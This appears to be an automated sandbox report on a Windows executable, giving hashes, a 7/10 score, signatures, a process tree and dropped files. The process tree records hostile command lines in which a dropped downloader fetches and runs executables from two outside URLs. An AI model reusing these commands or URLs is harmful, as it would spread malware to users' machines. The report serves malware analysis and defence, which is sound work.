Analysis

  • max time kernel
    161s
  • max time network
    182s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/12/2023, 00:49

General

  • Target

    0911441061894b90e42a529e5c160ccd.exe

  • Size

    94KB

  • MD5

    0911441061894b90e42a529e5c160ccd

  • SHA1

    acce46815a6e101c09405f0a466dcb10e14d700b

  • SHA256

    32ee4de13f5ed088bf89be3f3b9232994e166d96ad1a34e66aafb316791ec465

  • SHA512

    bb955568898b8a1f02ec983295fb33f9b7944eb81b642cdc390580bb21d11f6141396316b4d444888f144b4cae90721764e545da69f3d88c9a4f2149fe8cc64a

  • SSDEEP

    1536:hgDQRnx6JuH2js2nzhl31VXsrNXGh62DZjZgA7dMBCkK:3txgSosaP3UrNWpZqA7dT

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0911441061894b90e42a529e5c160ccd.exe
    "C:\Users\Admin\AppData\Local\Temp\0911441061894b90e42a529e5c160ccd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~DC75.bat "C:\Users\Admin\AppData\Local\Temp\0911441061894b90e42a529e5c160ccd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Users\Admin\AppData\Local\Ins.exe
        "C:\Users\Admin\AppData\Local\ins.exe" "http://dl.pipi.cn/pipi_dae_473.exe"
        3⤵
        • Executes dropped EXE
        PID:4860
      • C:\Users\Admin\AppData\Local\Ins.exe
        "C:\Users\Admin\AppData\Local\ins.exe" "http://www.xunlei100.com/msn/software/partner/w/bibibei20.exe"
        3⤵
        • Executes dropped EXE
        PID:752

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Ins.exe

    Filesize

    25KB

    MD5

    956e9eaaf57a8c8630a19ada434ccfda

    SHA1

    acda7ee39276fc3d94b02d258687a0b24461d162

    SHA256

    7774c6545fcea38e9492780ee6c5ea4d60d71a4343014018b8b3577c084e5c66

    SHA512

    cb36ec6ec3229c02f9dcd4a6374711bb4586e9dd257d1fc19c4938b6fcc2046fe57432ab2a09a242bc9f640bd90ea31a96ac593a4c9e49b65388af40fbedf996

  • C:\Users\Admin\AppData\Local\Temp\~DC75.bat

    Filesize

    151B

    MD5

    aa8379711ae47175300cb2e5c5564240

    SHA1

    f41a3f91673306caa57ebeb8b6e278478521c9cc

    SHA256

    884ad4d075a5d186a9dfb75e49ecb45609c8fe3da1795812438933f970303a8a

    SHA512

    6a271b589fdb903d286e22aa4b242d37ec8c5136291cb856e68a2a61e1ebec160e636f1f04ee86ec9a0697b13c64829bcde17bc0020d1e95e5a39e436df7dd43

  • memory/2388-8-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB